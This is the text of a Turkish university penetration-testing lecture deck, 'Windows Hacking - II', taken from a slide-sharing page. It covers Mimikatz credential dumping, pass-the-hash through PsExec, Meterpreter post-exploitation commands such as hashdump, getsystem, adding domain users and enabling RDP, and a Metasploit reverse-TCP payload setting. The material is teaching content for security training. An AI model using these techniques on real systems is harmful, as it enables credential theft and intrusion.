byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
PPTX
Hacking Uygulamaları ve Araçları
byMustafa
 
PPTX
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
byEPICROUTERS
 
PDF
Siber tehdit avcılığı 1
byKurtuluş Karasu
 
PPTX
Man In The Middle
byHarun Tamokur
 
PDF
Siber Güvenlik ve Etik Hacking Sunu - 1
byMurat KARA
 
PDF
Zafiyet tespiti ve sizma yöntemleri
byEPICROUTERS
 
PPSX
Cyber Security-Şirket içi Çalışan Eğitim ve Bilgilendirme
byGökhan CANSIZ
 
PDF
IstSec'14 - Seyfullah KILIÇ - Sosyal Mühendisilk
byBGA Cyber Security
 
PDF
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
byBGA Cyber Security
 
PDF
Windows Sistemlerde Yetkili Hesapları İzleyerek Yanal Hareketleri Yakalama
byBGA Cyber Security
 
PDF
Sosyal muhendislik 1
byFerhat Ozgur Catak
 
DOCX
EXPLOIT POST EXPLOITATION
byBGA Cyber Security
 
PDF
Windows hacking 1
byFerhat Ozgur Catak
 
PDF
Microsoft Active Directory'deki En Aktif Saldirilar
byAdeo Security
 
PDF
60bildiri
byIsmail Sen
 
PDF
14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat
byÇağrı Polat
 
Siber Güvenlik ve Etik Hacking Ders Sunusu (Güncelleme - 2025)
byMurat KARA
 
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
byPRISMA CSI
 
Siber Guvenlik ve Etik Hhacking -2-
byMurat KARA
 
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
Hacking Uygulamaları ve Araçları
byMustafa
 
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
byEPICROUTERS
 
Siber tehdit avcılığı 1
byKurtuluş Karasu
 
Man In The Middle
byHarun Tamokur
 
Siber Güvenlik ve Etik Hacking Sunu - 1
byMurat KARA
 
Zafiyet tespiti ve sizma yöntemleri
byEPICROUTERS
 
Cyber Security-Şirket içi Çalışan Eğitim ve Bilgilendirme
byGökhan CANSIZ
 
IstSec'14 - Seyfullah KILIÇ - Sosyal Mühendisilk
byBGA Cyber Security
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
byBGA Cyber Security
 
Windows Sistemlerde Yetkili Hesapları İzleyerek Yanal Hareketleri Yakalama
byBGA Cyber Security
 
Sosyal muhendislik 1
byFerhat Ozgur Catak
 
EXPLOIT POST EXPLOITATION
byBGA Cyber Security
 
Windows hacking 1
byFerhat Ozgur Catak
 
Microsoft Active Directory'deki En Aktif Saldirilar
byAdeo Security
 
60bildiri
byIsmail Sen
 
14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat
byÇağrı Polat
 

More from Ferhat Ozgur Catak

PDF
Dağıtık Servis Dışı Bırakma Saldırıları
byFerhat Ozgur Catak
 
PDF
Veritabanı Sızma Testleri - 2
byFerhat Ozgur Catak
 
PDF
Ddos Sızma Testleri - 2
byFerhat Ozgur Catak
 
PDF
Sızma Testi ve Güvenlik Denetlemeleri - Giriş
byFerhat Ozgur Catak
 
PDF
Siber Güvenlik ve Yapay Zeka
byFerhat Ozgur Catak
 
PDF
Pivoting ve Tunneling
byFerhat Ozgur Catak
 
PDF
Siber Güvenlik ve Yapay Zeka
byFerhat Ozgur Catak
 
PPTX
Korelasyon tabanlı nitelik seçimi
byFerhat Ozgur Catak
 
PDF
Secure Multi-Party Computation Based Privacy Preserving Extreme Learning Mach...
byFerhat Ozgur Catak
 
PDF
Dağıtık Sistemler İçin Mahremiyet Korumalı Uç Öğrenme Makinesi Sınıflandırma ...
byFerhat Ozgur Catak
 
PDF
Rassal Bölümlenmiş Veri Üzerinde Aşırı Öğrenme Makinesi ve Topluluk Algoritma...
byFerhat Ozgur Catak
 
PDF
Fuzzy Analytic Hierarchy Based DBMS Selection In Turkish National Identity Ca...
byFerhat Ozgur Catak
 
PDF
Eşle/İndirge Yöntemi Kullanılarak Destek Vektör Makinesi Algoritması ile Yü...
byFerhat Ozgur Catak
 
PDF
Robust Ensemble Classifier Combination Based on Noise Removal with One-Class SVM
byFerhat Ozgur Catak
 
PDF
MapReduce based SVM
byFerhat Ozgur Catak
 
Dağıtık Servis Dışı Bırakma Saldırıları
byFerhat Ozgur Catak
 
Veritabanı Sızma Testleri - 2
byFerhat Ozgur Catak
 
Ddos Sızma Testleri - 2
byFerhat Ozgur Catak
 
Sızma Testi ve Güvenlik Denetlemeleri - Giriş
byFerhat Ozgur Catak
 
Siber Güvenlik ve Yapay Zeka
byFerhat Ozgur Catak
 
Pivoting ve Tunneling
byFerhat Ozgur Catak
 
Siber Güvenlik ve Yapay Zeka
byFerhat Ozgur Catak
 
Korelasyon tabanlı nitelik seçimi
byFerhat Ozgur Catak
 
Secure Multi-Party Computation Based Privacy Preserving Extreme Learning Mach...
byFerhat Ozgur Catak
 
Dağıtık Sistemler İçin Mahremiyet Korumalı Uç Öğrenme Makinesi Sınıflandırma ...
byFerhat Ozgur Catak
 
Rassal Bölümlenmiş Veri Üzerinde Aşırı Öğrenme Makinesi ve Topluluk Algoritma...
byFerhat Ozgur Catak
 
Fuzzy Analytic Hierarchy Based DBMS Selection In Turkish National Identity Ca...
byFerhat Ozgur Catak
 
Eşle/İndirge Yöntemi Kullanılarak Destek Vektör Makinesi Algoritması ile Yü...
byFerhat Ozgur Catak
 
Robust Ensemble Classifier Combination Based on Noise Removal with One-Class SVM
byFerhat Ozgur Catak
 
MapReduce based SVM
byFerhat Ozgur Catak
 

Windows Hacking 2

  • 1.
    Ke¸sif (Devam) Exploitation Post-Exploit Windows Hacking- II BGM 554 - Sızma Testleri ve G¨uvenlik Denetlemeleri-II Bilgi G¨uvenli˘gi M¨uhendisli˘gi Y¨uksek Lisans Programı Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr ˙Istanbul S¸ehir ¨Universitesi 2016/2017 - Bahar Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 2.
    Ke¸sif (Devam) Exploitation Post-Exploit ˙I¸cindekiler 1 Ke¸sif(Devam) Mimikatz Demo smb enumshares 2 Exploitation Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 3.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares ˙I¸cindekiler 1 Ke¸sif (Devam) Mimikatz Demo smb enumshares 2 Exploitation Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 4.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares Mimikatz Demo I Mimikatz Windows i¸sletim sisteminde oturum a¸cıldı˘gında kullanıcı ad/parola memory’de saklanır. Bir bilgisayara active directory hesabı kullanılarak oturum a¸cıldı˘gında parola yine memory ¨uzerinde olacaktır. Bu zafiyet kullanılarak LSA prosesi exploit edilir. Mimikatz aracı kullanılarak LSASS (Local Security Authority Process) prosesi dump edilerek olu¸sturulan dosyayı a¸cılabilmektedir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 5.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares Mimikatz Demo II Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 6.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares Mimikatz Demo III Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 7.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares Mimikatz Demo IV Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 8.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares Mimikatz Demo V Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 9.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares Mimikatz Demo VI Mimikatz Genellikle bir betik kullanılarak bu s¨ureci otomatize edebilmektedirler. Procdump 1 ftp veya benzeri bir y¨ontemle dosyanın dı¸sarı aktarılması ve eri¸sim sa˘glama y¨ontemi Mimikatz2 sadece oturum a¸cmı¸s kullanıcıları de˘gil aynı zamanda daha ¨once oturum a¸cmı¸s kullanıcılara ait bilgilerede eri¸sebilmektedir. Mimikatz terminal sunucu ¨uzerinde ¸calı¸stırılması durumunda sunucuyu kullanmı¸s b¨ut¨un kullanıcılar hakkında bilgi edinilebilir. 1 https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx 2 https://github.com/gentilkiwi/mimikatz/releases Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 10.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares smb enumshares I Administrative Shares Sistem y¨oneticilerinin bir a˘ga ba˘glı sistemdeki her disk birimine uzaktan eri¸smesine olanak tanıyan Windows NT i¸sletim sistemi ailesi tarafından olu¸sturulan gizli a˘g payla¸sımlarıdır. Disk volumes: Sistemdeki her disk birimi, administrative share olarak payla¸stırılır. C, D ve E birimlerinin bulundu˘gu bir sistem, C$, D$ veya E$ adlı ¨u¸c payla¸sıma sahiptir. OS folder: Windows’un y¨ukl¨u oldu˘gu klas¨or admin$ Fax cache: Fakslanan sayfaların ve kapak sayfalarının ¨onbelle˘ge alındı˘gı klas¨or, fax$ IPC shares: inter-process communication ipc$ Printers folder: Y¨ukl¨u yazıcıları temsil eden nesneyi i¸ceren sanal klas¨or, print$ Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 11.
    Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demosmb enumshares smb enumshares II Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 12.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları ˙I¸cindekiler 1 Ke¸sif (Devam) Mimikatz Demo smb enumshares 2 Exploitation Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 13.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Giri¸s I Giri¸s Ke¸sif a¸samasında ve i¸c a˘g testleri sırasında elde edilen bilgiler do˘grultusunda sistemlere eri¸sim sa˘glanması Kullanılan y¨ontemler Sistemlerde bulunan zafiyetler Yerel y¨onetici hesapları Pass the hash(Psexec vb.) Kaba kuvvet saldırıları ˙I¸c a˘g testlerinde elde edilen kullanıcı bilgileri i¸ceren dosyalar Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 14.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Pass the Hash Pass the Hash G¨u¸cl¨u bir parola politikası oldu˘gu durumlarda NTLM ¸sifre ¨ozetlerinin kırılması uzun s¨ureler alabilmektedir. Bu durumlara kar¸sı ¨ozellikle Windows sistemlerde ¸sifre ¨ozetleri kullanılarak sistemlere eri¸sim sa˘glanabilmektedir. Pass the Hash y¨ontemi Windows sistemlerde dosya, yazıcı payla¸sımları gibi bilgisayar kaynaklarının payla¸sılmasını sa˘glayan Server Message Block (SMB) protokol¨un¨u kullanır. Pass the Hash y¨onteminin ¸calı¸sması i¸cin hedef bilgisayarda y¨onetimsel payla¸sımların ya da y¨onetici hakkıyla a¸cılmı¸s ba¸ska payla¸sımların bulunması gerekmektedir. Pass the Hash y¨ontemini kullanarak hedef bilgisayarlara eri¸sim sa˘glayan ara¸clardan birisi PsExec’tir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 15.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit I PsExec - Metasploit Metasploit PsExec aracının hedef bilgisayar ¨uzerinde oturum a¸cabilmesi i¸cin gerekli bilgiler ¸sunlardır: Hedef bilgisayara ait IP adresi Kullanıcı adı Parola ¨ozeti Y¨onetimsel payla¸sım Hedef bilgisayar ¨uzerinde Pass the Hash y¨ontemini engellemek i¸cin herhangi bir g¨uvenlik politikası uygulanmamı¸ssa, yukarıdaki bilgiler do˘grultusunda y¨uksek seviyeli haklarla a¸cılan bir meterpreter oturumu elde edilibilir. PsExec aracının oturum a¸cabilmesi i¸cin araca verilen kullanıcının hedef bilgisayar ¨uzerinde y¨onetimsel payla¸sımlar ¨uzerinde hak sahibi olması gerekmektedir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 16.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit II Parametreler RHOST: Hedef bilgisayara ait IP bilgisi RPORT: Hedef bilgisayar ¨uzerinde SMB protokol¨un¨un ¸calı¸stı˘gı port SHARE: Hedef bilgisayarda kullanılacak y¨onetimsel payla¸sım SMBDomain: Hedef bilgisayar ¨uzerinde yetkili olan kullanıcı hesabının ¨uye oldu˘gu etki alanı (Workgroup – Etki alanı) SMBUser: Hedef bilgisayar ¨uzerinde yetkili olan kullanıcı SMBPass: Hedef bilgisayar ¨uzerinde yetkili olan kullanıcıya ait parola ya da ¸sifre ¨ozeti set payload windows/meterpreter/reverse tcp set LHOST 192.168.4.33 set LPORT 443 Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 17.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit III Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 18.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit IV Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 19.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit V Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 20.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec I Sysinternals PsExec Sysinternals PsExec 3 aracının hedef bilgisayar ¨uzerinde oturum a¸cabilmesi i¸cin gerekli bilgiler ¸sunlardır: Hedef bilgisayara ait IP adresi Kullanıcı adı Parola Y¨onetimsel payla¸sım Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 21.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec II 3 https://technet.microsoft.com/tr-tr/sysinternals/bb897553.aspx Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 22.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec + Wce I PsExec + Wce Wce4 S¸ifre ¨ozetinin kullanılarak PsExec’in ¸calı¸stırılması Hedef bilgisayara ait kullanıcı adı ve ¸sifre ¨ozeti bilgisi hedef bilgisayarın IP adresi ile birlikte PsExec aracının ¸calı¸stırılaca˘gı bilgisayarın belle˘gine y¨uklenmektedir. PsExec aracına herhangi bir kullanıcı bilgisi ve ¸sifre ¨ozeti bilgisi verilmeden hedef bilgisayar ¨uzerinde komut satırı eri¸simi elde edilir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 23.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec + Wce II 4 http://www.ampliasecurity.com/research/windows-credentials-editor/ Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 24.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Passthe Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec Sınırlandırmaları I Y¨onetimsel payla¸sımların kapalı olması AutoShareWks => 0 HKEY LOCAL MACHINESYSTEMCurrentControlSet Services LanmanServerParametersAutoShareWks AutoShareServer => 0 HKEY LOCAL MACHINESYSTEMCurrentControlSet ServicesLanmanServerParametersAutoShareServer Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 25.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin ˙I¸cindekiler 1 Ke¸sif (Devam) Mimikatz Demo smb enumshares 2 Exploitation Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 26.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Post-Exploit I Sistemlere sızıldıktan sonra ger¸cekle¸stirilen i¸slemler Meterpreter ¨uzerinde yapılan i¸slemler Parola ¨ozetleri elde etme Parola ¨ozetlerini kırma Etki alanına yetkili kullanıcı ekleme Bellekten parola alma Envanter, ba˘glantı bilgisi vb. bilgiler i¸ceren dosyaları arama Sunucu yedekleri tespit etme Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 27.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Post-Exploit II Post-exploitation sonrası elde edilen bilgiler Kullanıcı adı ve parola bilgileri S¸ifre ¨ozetleri Etki alanında yetkili kullanıcı Sistemler hakkında detaylı bilgi Sunucu yedekleri Etki alanı kullanıcıları ve ¸sifre ¨ozetleri Veritabanı ba˘glantı bilgileri Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 28.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter I Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 29.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter II Meterpreter Stdapi, Priv ve Core meterpreter oturumu a¸cıldı˘gında otomatik olarak y¨uklenmektedir. Y¨ukl¨u olmayan eklentileri kullanabilmek i¸cin “load eklenti adı” ¸calı¸stırılmalıdır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 30.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Core komutları Core Komutları Background: Aktif olan meterpreter oturumunu arka plana alarak, metasploit ekranına d¨on¨ulmesini sa˘glar. Session –i komutu ile tekrar ilgili meterpreter oturumuna geri d¨on¨ul¨ur. Migrate: Farklı bir kullanıcının ¸calı¸stırdı˘gı s¨urecin elde edilmesini ve o kullanıcının haklarının kullanılmasını sa˘glar. S¸u an ¸calı¸san s¨urecin hakkından daha y¨uksek haklı bir s¨urece ge¸ci¸s yapılamaz. Exit: Aktif olan meterpreter oturumunu sonlandırır. Run: Meterpreter oturumu ¨uzerinde post mod¨uller ya da script ¸calı¸stırmak i¸cin kullanılır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 31.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Stdapi Komutları I Stdapi Komutları Meterpreter oturumunda en ¸cok kullanılan komutların bulundu˘gu eklentidir. ¨U¸c alt ba¸slı˘ga sahiptir: Dosya sistemi Sistem Kullanıcı aray¨uz¨u. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 32.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Stdapi Komutları II 1. File System Komutları cd/lcd: Dosya sistemleri ¨uzerinde dola¸sma i¸cin kullanılır. l (local) harfi i¸slemin metasploit aracının kurulu oldu˘gu bilgisayardaki dosya sisteminde ger¸cekle¸sti˘gini belirtir. upload/download: Hedef bilgisayara dosya y¨ukleme ve hedef bilgisayardan dosya indirmek i¸cin kullanılır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 33.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Stdapi Komutları III 2. System Komutları getpid/getuid: Meterpreter oturumunun hangi kullanıcı ile a¸cıldı˘gını g¨osterir. shell: Hedef bilgisayar ¨uzerinde komut satırı eri¸simi sa˘glar. sysinfo: Hedef bilgisayar hakkında bilgi verir. ps: Hedef bilgisayarda ¸calı¸san s¨ure¸cleri ve s¨ure¸clerle ilgili bilgileri g¨osterir. kill: Hedef bilgisayar ¨uzerinde ¸calı¸san s¨ure¸cleri ¨old¨urmek i¸cin kullanılır. reg: Hedef bilgisayardaki kayıt defterini y¨onetmek i¸cin kullanılır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 34.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Stdapi Komutları IV 3. User Interface idletime: Hedef bilgisayarda oturum a¸cmı¸s kullanıcının i¸slem yapmadı˘gı s¨ureyi belirtir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 35.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Priv ve Incognito Eklentileri I Priv ve Incognito Eklentileri Priv: hedef bilgisayar ¨uzerinde hak y¨ukseltmek Incognito: etki alanında hak y¨ukseltmek ve y¨onetici olmak Priv komutları Getsystem: SYSTEM haklarını elde etmek i¸cin kullanılır. Bilgisayardaki bazı g¨uvenlik maddelerine ba˘glı olarak bazen ¸calı¸smayabilmektedir. Hashdump: Hedef bilgisayarda bulunan yerel kullanıcı ¸sifre ¨ozetlerini elde eder. C¸alı¸smayabilir. Alternatif olarak hashdump post mod¨ul¨u kullanılabilir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 36.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Priv ve Incognito Eklentileri II Incognito komutları Add user: Hedef bilgisayara ya da etki alanına kullanıcı ekler. Add group user: Hedef bilgisayardaki ya da etki alanındaki gruplara kullanıcı ekler. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 37.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Priv ve Incognito Eklentileri III Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 38.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Mimikatz Eklentisi I Mimikatz Mimikatz: Windows sistemlerde bellekte saklanan parolaları elde etmek i¸cin kullanılmaktadır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 39.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Mimikatz Eklentisi II Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 40.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri I Meterpreter Post Post mod¨uller: bilgi toplamak ve ¸ce¸sitli i¸slemler ger¸cekle¸stirmektedir Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 41.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri II enum termserv Post Modul¨u Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 42.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri III Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 43.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri IV hashdump Post Modul¨u Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 44.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri V enable rdp Post Modul¨u Bilgisayara uzak masa¨ust¨u oturumu a¸cılmasına izin veren de˘geri de˘gi¸stirir (fDenyTSConnections 1 => Uzak masa¨ust¨u oturumuna izin verme). Uzak masa¨ust¨u servisinin ba¸slatma durumu “Devre Dı¸sı (Disabled)” ise, “Otomatik (Automatic)” olarak de˘gi¸stirir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 45.
